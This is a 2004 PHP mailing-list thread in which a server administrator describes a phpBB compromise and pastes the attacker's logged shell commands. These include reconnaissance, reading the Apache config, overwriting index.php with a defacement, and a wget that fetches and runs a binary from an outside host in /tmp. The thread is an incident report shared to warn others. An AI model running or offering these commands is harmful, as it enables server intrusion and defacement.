Thanks
-pa
----- Original Message ----- From: "John Nichel" <jnichel@xxxxxxxxxx>
To: "PHP Mailing Lists" <php-general@xxxxxxxxxxxxx>
Sent: Wednesday, December 22, 2004 5:46 PM
Subject: Re: PHP Exploit via phpBB?
John Holmes wrote:From: John Nichel <john@xxxxxxxxxxxx>
I'm currently going thru logs from previous days to see if I was getting this 'attack' before upgrading to php v4.3.10
That's why I'm wanted to post this here...just in case it isn't phpBB problem.
Many people were trying to tie the vulnerabilities with PHP 4.3.9 to this attack the vulnerabilities in phpBB, but from what I read they were unrelated. Are you on a shared server at all? It may be possible that someone else got attacked and took everyone with them...
Yeah, I had been reading about that, but this didn't happen until after I upgraded to 4.3.10. I had upgraded to phpBB 2.0.11, about two weeks ago. That was confusing the hell out of me...here I was using the most recent versions of both phpBB and PHP 4.x, and it still happened...not to mention it happening about 1.5 hours after upgrading php. We're on a dedicated box, and my Rush site is the only one running phpBB, and after digging for the rest of today, I found that it was definitely the fault of phpBB. This post was pointed out to me by a list member...
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
So I made that change too, even though I *thought* it was changed in v2.0.11. Course, I probably screwed something up when patching the files. ;) I disabled the system() function too, just in case. These are all the system calls it made...
echo ___INICIO___;uname -a;echo ___FIM___;
echo ___INICIO___;cat /proc/cpuinfo;echo ___FIM___;
echo ___INICIO___;cat /usr/local/apache/conf/httpd.conf;echo ___FIM___;
echo ___INICIO___;cat /usr/local/apache/;ls;echo ___FIM___;
echo ___INICIO___;echo hh > hac.hrml;ls;echo ___FIM___;
echo ___INICIO___;echo H4ck3rSBR ownz your by xdr0p455 > index.php;echo ___FIM___;
echo ___INICIO___;pwd;echo ___FIM___;
echo ___INICIO___;pwd;echo ___FIM___;
echo ___INICIO___;pwd;echo ___FIM___;
echo ___INICIO___;mv -f index.php /webserver/vhosts/by-tor.com/docs/index.php;echo ___FIM___;
echo ___INICIO___;cd /tmp;wget http://www.intranorth.com.br/xpl/r0nin;chmod 777 r0nin;./r0nin;echo ___FIM___;
echo ___INICIO___;pwd;echo ___FIM___;
echo ___INICIO___;id;echo ___FIM___;
I'm still trying to figure out how it found all the rest of my vhosts on that box. I see it did a cat /usr/local/apache/conf/httpd.conf to try and read my Apache config file, but mine doesn't live there. It also downloaded a file from a Brazilian website, and executed it in the /tmp directory...I deleted all of those, but saved one to 'play' with later.
With any luck, someone else will read thru this, and maybe they'll be luckier than I.
-- By-Tor.com ...it's all about the Rush http://www.by-tor.com
-- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
-- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean.
-- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean.
-- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php